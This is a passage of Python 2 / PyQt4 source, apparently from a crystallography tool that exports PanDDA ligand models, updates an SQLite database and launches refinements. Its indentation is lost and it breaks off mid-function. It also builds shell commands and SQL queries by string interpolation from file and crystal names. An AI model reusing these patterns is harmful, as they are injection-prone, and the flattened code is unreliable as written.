from PyQt4 import QtGui, QtCore
import math
#from XChemUtils import mtztools
import XChemDB
import XChemRefine
import XChemUtils
import XChemLog
import XChemToolTips
import csv
try:
import gemmi
import pandas
except ImportError:
pass
#def get_names_of_current_clusters(xce_logfile,panddas_directory):
# Logfile=XChemLog.updateLog(xce_logfile)
# Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory))
# os.chdir('{0!s}/cluster_analysis'.format(panddas_directory))
# cluster_dict={}
# for out_dir in sorted(glob.glob('*')):
# if os.path.isdir(out_dir):
# cluster_dict[out_dir]=[]
# found_first_pdb=False
# for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
# xtal=folder[folder.rfind('/')+1:]
# if not found_first_pdb:
# if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ):
# cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb'))
# found_first_pdb=True
# cluster_dict[out_dir].append(xtal)
# return cluster_dict
class export_and_refine_ligand_bound_models(QtCore.QThread):
def __init__(self,PanDDA_directory,datasource,project_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.PanDDA_directory = PanDDA_directory
self.datasource = datasource
self.db = XChemDB.data_source(self.datasource)
self.Logfile = XChemLog.updateLog(xce_logfile)
self.xce_logfile = xce_logfile
self.project_directory = project_directory
self.which_models=which_models
self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.initial_model_directory=initial_model_directory
# self.db.create_missing_columns()
# self.db_list=self.db.get_empty_db_dict()
# self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.xce_logfile=xce_logfile
# self.already_exported_models=[]
def run(self):
self.Logfile.warning(XChemToolTips.pandda_export_ligand_bound_models_only_disclaimer())
# find all folders with *-pandda-model.pdb
modelsDict = self.find_modeled_structures_and_timestamps()
# if only NEW models shall be exported, check timestamps
if not self.which_models.startswith('all'):
modelsDict = self.find_new_models(modelsDict)
# find pandda_inspect_events.csv and read in as pandas dataframe
inspect_csv = None
if os.path.isfile(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv')):
inspect_csv = pandas.read_csv(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv'))
progress = 0
try:
progress_step = float(1/len(modelsDict))
except TypeError:
self.Logfile.error('DID NOT FIND ANY MODELS TO EXPORT')
return None
for xtal in sorted(modelsDict):
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
pandda_model = os.path.join('modelled_structures',xtal + '-pandda-model.pdb')
pdb = gemmi.read_structure(pandda_model)
# find out ligand event map relationship
ligandDict = XChemUtils.pdbtools_gemmi(pandda_model).center_of_mass_ligand_dict('LIG')
if ligandDict == {}:
self.Logfile.error(xtal + ': cannot find ligand of type LIG; skipping...')
continue
self.show_ligands_in_model(xtal,ligandDict)
emapLigandDict = self.find_ligands_matching_event_map(inspect_csv,xtal,ligandDict)
self.Logfile.warning('emapLigandDict' + str(emapLigandDict))
# convert event map to SF
self.event_map_to_sf(pdb.resolution,emapLigandDict)
# move existing event maps in project directory to old folder
self.move_old_event_to_backup_folder(xtal)
# copy event MTZ to project directory
self.copy_event_mtz_to_project_directory(xtal)
# copy pandda-model to project directory
self.copy_pandda_model_to_project_directory(xtal)
# make map from MTZ and cut around ligand
self.make_and_cut_map(xtal,emapLigandDict)
# update database
self.update_database(xtal,modelsDict)
# refine models
self.refine_exported_model(xtal)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
def update_database(self,xtal,modelsDict):
db_dict = {}
timestamp_file = modelsDict[xtal]
db_dict['DatePanDDAModelCreated'] = timestamp_file
db_dict['RefinementOutcome'] = '3 - In Refinement'
self.Logfile.insert('updating database for '+xtal+' setting time model was created to '+db_dict['DatePanDDAModelCreated'])
self.db.update_data_source(xtal,db_dict)
def make_and_cut_map(self,xtal,emapLigandDict):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
XChemUtils.pdbtools_gemmi(xtal + '-pandda-model.pdb').save_ligands_to_pdb('LIG')
for ligID in emapLigandDict:
m = emapLigandDict[ligID]
emtz = m.replace('.ccp4','_' + ligID + '.mtz')
emap = m.replace('.ccp4','_' + ligID + '.ccp4')
XChemUtils.maptools().calculate_map(emtz,'FWT','PHWT')
XChemUtils.maptools().cut_map_around_ligand(emap,ligID+'.pdb','7')
if os.path.isfile(emap.replace('.ccp4','_mapmask.ccp4')):
os.system('/bin/mv %s %s_%s_event.ccp4' %(emap.replace('.ccp4','_mapmask.ccp4'),xtal,ligID))
os.system('ln -s %s_%s_event.ccp4 %s_%s_event_cut.ccp4' %(xtal,ligID,xtal,ligID))
def copy_pandda_model_to_project_directory(self,xtal):
os.chdir(os.path.join(self.project_directory,xtal))
model = os.path.join(self.PanDDA_directory,'processed_datasets',xtal,'modelled_structures',xtal+'-pandda-model.pdb')
self.Logfile.insert('copying %s to project directory' %model)
os.system('/bin/cp %s .' %model)
def copy_event_mtz_to_project_directory(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
for emap in glob.glob('*-BDC_*.mtz'):
self.Logfile.insert('copying %s to %s...' %(emap,os.path.join(self.project_directory,xtal)))
os.system('/bin/cp %s %s' %(emap,os.path.join(self.project_directory,xtal)))
def move_old_event_to_backup_folder(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
if not os.path.isdir('event_map_backup'):
os.mkdir('event_map_backup')
self.Logfile.insert('moving existing event maps to event_map_backup')
for emap in glob.glob('*-BDC_*.ccp4'):
os.system('/bin/mv %s event_map_backup/%s' %(emap,emap+'.'+str(datetime.now()).replace(' ','_').replace(':','-')))
def show_ligands_in_model(self,xtal,ligandDict):
self.Logfile.insert(xtal + ': found the following ligands...')
for lig in ligandDict:
self.Logfile.insert(lig + ' -> coordinates ' + str(ligandDict[lig]))
def find_modeled_structures_and_timestamps(self):
self.Logfile.insert('finding out modelled structures in ' + self.PanDDA_directory)
modelsDict={}
for model in sorted(glob.glob(os.path.join(self.PanDDA_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb'))):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
modelsDict[sample]=timestamp
return modelsDict
def find_new_models(self,modelsDict):
samples_to_export = {}
self.Logfile.hint('XCE will never export/ refine models that are "5-deposition ready" or "6-deposited"')
self.Logfile.hint('Please change the RefinementOutcome flag in the Refinement table if you wish to re-export them')
self.Logfile.insert('checking timestamps of models in database...')
for xtal in modelsDict:
timestamp_file = modelsDict[xtal]
db_query=self.db.execute_statement("select DatePanDDAModelCreated from mainTable where CrystalName is '"+xtal+"' and (RefinementOutcome like '3%' or RefinementOutcome like '4%')")
try:
timestamp_db=str(db_query[0][0])
except IndexError:
self.Logfile.warning('%s: database query gave no results for DatePanDDAModelCreated; skipping...' %xtal)
self.Logfile.warning('%s: this might be a brand new model; will continue with export!' %xtal)
samples_to_export[xtal]=timestamp_file
timestamp_db = "2100-01-01 00:00:00" # some time in the future...
try:
difference=(datetime.strptime(timestamp_file,'%Y-%m-%d %H:%M:%S') - datetime.strptime(timestamp_db,'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+xtal+' -> was already refined, but newer PanDDA model available')
samples_to_export[xtal]=timestamp_file
else:
self.Logfile.insert('%s: model has not changed since it was created on %s' %(xtal,timestamp_db))
except (ValueError, IndexError), e:
self.Logfile.error(str(e))
return samples_to_export
def event_map_to_sf(self,resolution,emapLigandDict):
for lig in emapLigandDict:
emap = emapLigandDict[lig]
emtz = emap.replace('.ccp4','.mtz')
emtz_ligand = emap.replace('.ccp4','_' + lig + '.mtz')
self.Logfile.insert('trying to convert %s to SF -> %s' %(emap,emtz_ligand))
self.Logfile.insert('>>> ' + emtz)
XChemUtils.maptools_gemmi(emap).map_to_sf(resolution)
if os.path.isfile(emtz):
os.system('/bin/mv %s %s' %(emtz,emtz_ligand))
self.Logfile.insert('success; %s exists' %emtz_ligand)
else:
self.Logfile.warning('something went wrong; %s could not be created...' %emtz_ligand)
def find_ligands_matching_event_map(self,inspect_csv,xtal,ligandDict):
emapLigandDict = {}
for index, row in inspect_csv.iterrows():
if row['dtag'] == xtal:
for emap in glob.glob('*-BDC_*.ccp4'):
self.Logfile.insert('checking if event and ligand are within 7A of each other')
x = float(row['x'])
y = float(row['y'])
z = float(row['z'])
matching_ligand = self.calculate_distance_to_ligands(ligandDict,x,y,z)
if matching_ligand is not None:
emapLigandDict[matching_ligand] = emap
self.Logfile.insert('found matching ligand (%s) for %s' %(matching_ligand,emap))
break
else:
self.Logfile.warning('current ligand not close to event...')
if emapLigandDict == {}:
self.Logfile.error('could not find ligands within 7A of PanDDA events')
return emapLigandDict
def calculate_distance_to_ligands(self,ligandDict,x,y,z):
matching_ligand = None
p_event = gemmi.Position(x, y, z)
for ligand in ligandDict:
c = ligandDict[ligand]
p_ligand = gemmi.Position(c[0], c[1], c[2])
self.Logfile.insert('coordinates ligand: ' + str(c[0])+' '+ str(c[1])+' '+str(c[2]))
self.Logfile.insert('coordinates event: ' + str(x)+' '+ str(y)+' '+str(z))
distance = p_event.dist(p_ligand)
self.Logfile.insert('distance between ligand and event: %s A' %str(distance))
if distance < 7:
matching_ligand = ligand
break
return matching_ligand
def refine_exported_model(self,xtal):
RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '',
'WATER': '',
'LIGOCC': '',
'SANITY': '' }
if 'nocheck' in self.which_models:
RefmacParams['SANITY'] = 'off'
self.Logfile.insert('trying to refine ' + xtal + '...')
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.project_directory,xtal)
if not os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.project_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),RefmacParams,self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
else:
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.project_directory, xtal)))
class refine_bound_state_with_buster(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.which_models=which_models
self.already_exported_models=[]
def run(self):
samples_to_export=self.export_models()
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in sorted(samples_to_export):
self.Logfile.insert(xtal)
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.initial_model_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
self.Logfile.insert('Note: you chose to export ALL available PanDDA!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
advice = ( 'The pandda model of '+xtal+' was changed, but it was already refined! '
'This is most likely because this was done with an older version of XCE. '
'If you really want to export and refine this model, you need to open the database '
'with DBbroweser (sqlitebrowser.org); then change the RefinementOutcome field '
'of the respective sample to "2 - PANDDA model", save the database and repeat the export prodedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
self.Logfile.insert('changing directory to ' + os.path.join(self.initial_model_directory,sample))
os.chdir(os.path.join(self.initial_model_directory,sample))
self.Logfile.insert(sample + ': copying ' + os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
os.system('/bin/cp %s .' %os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
for old_event_map in glob.glob('*-BDC_*.ccp4'):
if not os.path.isdir('old_event_maps'):
os.mkdir('old_event_maps')
self.Logfile.warning(sample + ': moving ' + old_event_map + ' to old_event_maps folder')
os.system('/bin/mv %s old_event_maps' %old_event_map)
for event_map in glob.glob(os.path.join(self.panddas_directory,'processed_datasets',sample,'*-BDC_*.ccp4')):
self.Logfile.insert(sample + ': copying ' + event_map)
os.system('/bin/cp %s .' %event_map)
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
return samples_to_export
class run_pandda_export(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,update_datasource_only,which_models,pandda_params):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.update_datasource_only=update_datasource_only
self.which_models=which_models
self.already_exported_models=[]
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '' }
def run(self):
# v1.3.8.2 - removed option to update database only
# if not self.update_datasource_only:
samples_to_export=self.export_models()
self.import_samples_into_datasouce(samples_to_export)
# if not self.update_datasource_only:
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in samples_to_export: self.Logfile.insert(xtal)
# sample_list=self.db.execute_statement("select CrystalName,CompoundCode from mainTable where RefinementOutcome='2 - PANDDA model';")
# for item in sample_list:
# xtal=str(item[0])
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
try:
os.system('/bin/rm *-ensemble-model.pdb *restraints*')
except:
self.Logfile.error("Restraint files didn't exist to remove. Will try to continue")
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
Refine=XChemRefine.panddaRefine(self.initial_model_directory,xtal,compoundID,self.datasource)
os.symlink(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb'),xtal+'-ensemble-model.pdb')
Refine.RunQuickRefine(Serial,self.RefmacParams,self.external_software,self.xce_logfile,'pandda_refmac',None)
# elif xtal in os.path.join(self.panddas_directory,'processed_datasets',xtal,'modelled_structures',
# '{}-pandda-model.pdb'.format(xtal)):
# self.Logfile.insert('{}: cannot start refinement because {}'.format(xtal,xtal) +
# ' does not have a modelled structure. Check whether you expect this dataset to ' +
# ' have a modelled structure, compare pandda.inspect and datasource,'
# ' then tell XCHEMBB ')
else:
self.Logfile.error('%s: cannot find %s-ensemble-model.pdb; cannot start refinement...' %(xtal,xtal))
self.Logfile.error('Please check terminal window for any PanDDA related tracebacks')
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def import_samples_into_datasouce(self,samples_to_export):
# first make a note of all the datasets which were used in pandda directory
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'False',DimplePANDDApath='{0!s}' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
# do the same as before, but look for rejected datasets
try:
os.chdir(os.path.join(self.panddas_directory,'rejected_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'True',DimplePANDDApath='{0!s}',DimplePANDDAhit = 'False' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
except OSError:
pass
site_list = []
pandda_hit_list=[]
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_sites.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
self.Logfile.insert('reding pandda_inspect_sites.csv')
for i,line in enumerate(csv_dict):
self.Logfile.insert(str(line).replace('\n','').replace('\r',''))
site_index=line['site_idx']
name=line['Name'].replace("'","")
comment=line['Comment']
site_list.append([site_index,name,comment])
self.Logfile.insert('add to site_list_:' + str([site_index,name,comment]))
progress_step=1
for i,line in enumerate(open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))):
n_lines=i
if n_lines != 0:
progress_step=100/float(n_lines)
else:
progress_step=0
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('reading '+os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
for i,line in enumerate(csv_dict):
db_dict={}
sampleID=line['dtag']
if sampleID not in samples_to_export:
self.Logfile.warning('%s: not to be exported; will not add to panddaTable...' %sampleID)
continue
if sampleID not in pandda_hit_list:
pandda_hit_list.append(sampleID)
site_index=str(line['site_idx']).replace('.0','')
event_index=str(line['event_idx']).replace('.0','')
self.Logfile.insert(str(line))
self.Logfile.insert('reading {0!s} -> site {1!s} -> event {2!s}'.format(sampleID, site_index, event_index))
for entry in site_list:
if entry[0]==site_index:
site_name=entry[1]
site_comment=entry[2]
break
# check if EVENT map exists in project directory
event_map=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*ccp4')):
filename=file[file.rfind('/')+1:]
if filename.startswith(sampleID+'-event_'+event_index) and filename.endswith('map.native.ccp4'):
event_map=file
self.Logfile.insert('found respective event maps in {0!s}: {1!s}'.format(self.initial_model_directory, event_map))
break
# initial pandda model and mtz file
pandda_model=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*pdb')):
filename=file[file.rfind('/')+1:]
if filename.endswith('-ensemble-model.pdb'):
pandda_model=file
if sampleID not in self.already_exported_models:
self.already_exported_models.append(sampleID)
break
inital_mtz=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*mtz')):
filename=file[file.rfind('/')+1:]
if filename.endswith('pandda-input.mtz'):
inital_mtz=file
break
db_dict['CrystalName'] = sampleID
db_dict['PANDDApath'] = self.panddas_directory
db_dict['PANDDA_site_index'] = site_index
db_dict['PANDDA_site_name'] = site_name
db_dict['PANDDA_site_comment'] = site_comment
db_dict['PANDDA_site_event_index'] = event_index
db_dict['PANDDA_site_event_comment'] = line['Comment'].replace("'","")
db_dict['PANDDA_site_confidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_InspectConfidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_ligand_placed'] = line['Ligand Placed']
db_dict['PANDDA_site_viewed'] = line['Viewed']
db_dict['PANDDA_site_interesting'] = line['Interesting']
db_dict['PANDDA_site_z_peak'] = line['z_peak']
db_dict['PANDDA_site_x'] = line['x']
db_dict['PANDDA_site_y'] = line['y']
db_dict['PANDDA_site_z'] = line['z']
db_dict['PANDDA_site_ligand_id'] = ''
db_dict['PANDDA_site_event_map'] = event_map
db_dict['PANDDA_site_initial_model'] = pandda_model
db_dict['PANDDA_site_initial_mtz'] = inital_mtz
db_dict['PANDDA_site_spider_plot'] = ''
# find apo structures which were used
# XXX missing XXX
self.db.update_insert_site_event_panddaTable(sampleID,db_dict)
# this is necessary, otherwise RefinementOutcome will be reset for samples that are actually already in refinement
self.db.execute_statement("update panddaTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and RefinementOutcome is null".format(sampleID))
self.db.execute_statement("update mainTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and (RefinementOutcome is null or RefinementOutcome is '1 - Analysis Pending')".format(sampleID))
self.db.execute_statement("update mainTable set DimplePANDDAhit = 'True' where CrystalName is '{0!s}'".format(sampleID))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('done reading pandda_inspect_sites.csv')
# finally find all samples which do not have a pandda hit
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
self.Logfile.insert('check which datasets are not interesting')
# DimplePANDDAhit
# for xtal in glob.glob('*'):
# if xtal not in pandda_hit_list:
# self.Logfile.insert(xtal+': not in interesting_datasets; updating database...')
# self.db.execute_statement("update mainTable set DimplePANDDAhit = 'False' where CrystalName is '{0!s}'".format(xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
self.Logfile.insert('Note: you chose to export ALL available PanDDA!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
elif self.which_models == 'selected':
for i in range(0, self.pandda_analyse_data_table.rowCount()):
if str(self.pandda_analyse_data_table.item(i, 0).text()) == sample:
if self.pandda_analyse_data_table.cellWidget(i, 1).isChecked():
self.Logfile.insert('Dataset selected by user -> exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
break
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
